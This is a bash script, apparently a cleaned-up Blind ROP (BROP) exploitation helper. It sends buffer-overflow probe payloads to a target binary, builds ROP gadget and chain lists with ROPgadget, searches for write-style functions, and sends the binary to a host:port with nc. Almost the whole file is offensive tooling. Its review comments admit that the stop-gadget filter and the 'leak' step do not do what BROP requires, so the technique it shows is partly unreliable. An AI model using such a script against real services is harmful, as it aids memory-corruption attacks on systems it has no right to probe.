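#!/bin/bash
# Blind ROP (BROP) helper.
#
# Feeds a local copy of the target a series of crafted stdin payloads (filler,
# filler + canary slot, filler + canary slot + saved-register marker), then
# collects gadget and symbol listings for later use, and finally pushes the
# binary to a host:port with nc.
#
# Usage: blind_rop.sh <target_binary> <offset> [host] [port]
#   target_binary  binary under test; executed locally, payload on stdin
#   offset         number of filler bytes before the canary slot. The
#                  original script referenced an undefined Python name
#                  `offset`, so every probe died with a NameError before the
#                  target was ever reached; it is now a required argument.
#   host, port     destination of the final nc step (defaults 127.0.0.1 80,
#                  the values the original hard-coded)
#
# Side effects: overwrites gadgets.txt, stop_gadgets.txt, brop_gadgets.txt and
# write_functions.txt in the current directory.
#
# Probes are *expected* to crash the target, so `set -e` is deliberately not
# used: a probe's non-zero exit status is the observation, not an error.
set -uo pipefail

usage() {
  printf 'Usage: %s <target_binary> <offset> [host] [port]\n' "${0##*/}" >&2
  exit 2
}

die() {
  printf '%s\n' "$*" >&2
  exit 1
}

#######################################
# Emit COUNT copies of one byte to stdout.
# Arguments: $1 - repeat count, $2 - byte as a printf %b escape ('A', '\x00')
#######################################
fill() {
  local count=$1 byte=$2 i
  for ((i = 0; i < count; i++)); do
    printf '%b' "$byte"
  done
}

#######################################
# Run the target with a payload on stdin and report how it exited.
# Arguments: $1 - status line to print, remaining args - payload command
# Globals:   target_path (read)
# A signal exit (e.g. 139 for SIGSEGV) is the interesting result here.
#######################################
probe() {
  local label=$1
  shift
  printf '%s\n' "$label"
  "$@" | "$target_path"
  # PIPESTATUS[1] is the target's status; $? would be the same under pipefail
  # only if the payload generator succeeded, so read it explicitly.
  printf '  target exit status: %d\n' "${PIPESTATUS[1]}"
}

# Payload shapes from the original script, kept byte-for-byte.
payload_offset() { fill "$offset" 'A'; }
payload_canary() { payload_offset; fill 8 '\x00'; }
payload_regs()   { payload_canary; printf '\x01\x02\x03\x04\x05\x06\x07\x08'; }

(( $# >= 2 )) || usage
target_binary="$1"
offset="$2"
target_host="${3:-127.0.0.1}"
target_port="${4:-80}"

[[ "$offset" =~ ^[0-9]+$ ]] || die "offset must be a non-negative integer, got: $offset"
# Resolve once so PATH lookup (a bare name) and an explicit path behave the
# same for both execution and the file-based tools below.
target_path=$(command -v -- "$target_binary") \
  || die "target binary not found or not executable: $target_binary"
for tool in ROPgadget strings nc; do
  command -v "$tool" >/dev/null 2>&1 || die "required tool not found in PATH: $tool"
done

probe "Finding buffer overflow offset..." payload_offset
probe "Finding canary..." payload_canary
probe "Finding saved registers (RBP / RIP)..." payload_regs

echo "Finding stop gadgets..."
# "00" is the same bad byte as the original "0", written as a full hex byte so
# it is accepted whether ROPgadget parses the list with int(x, 16) or fromhex.
ROPgadget --binary "$target_path" --ropchain --badbytes 00 > gadgets.txt
# NOTE(review): coarse heuristic carried over from the original — nearly every
# gadget ends in `ret`, so this is a candidate list, not a verified set. A BROP
# stop gadget is one that makes the remote process hang rather than crash, which
# only probing can confirm.
grep -E 'ret|pop|leave|retf' gadgets.txt > stop_gadgets.txt

echo "Finding brop gadgets..."
ROPgadget --binary "$target_path" --ropchain > brop_gadgets.txt

echo "Finding a Write function (write / dprintf / puts / ...)..."
# Candidate output functions by symbol/string name; a hit here only means the
# name appears in the file, not that it is callable from the overflow.
strings -- "$target_path" | grep -E 'write|dprintf|puts' > write_functions.txt

echo "Leaking the binary for target binaryes and servers..."
# NOTE(review): this *uploads the local binary* to host:port. It does not dump
# the remote process's text segment, which is what a BROP "leak" step would do;
# kept for compatibility with the original, now with an explicit destination.
nc "$target_host" "$target_port" < "$target_path"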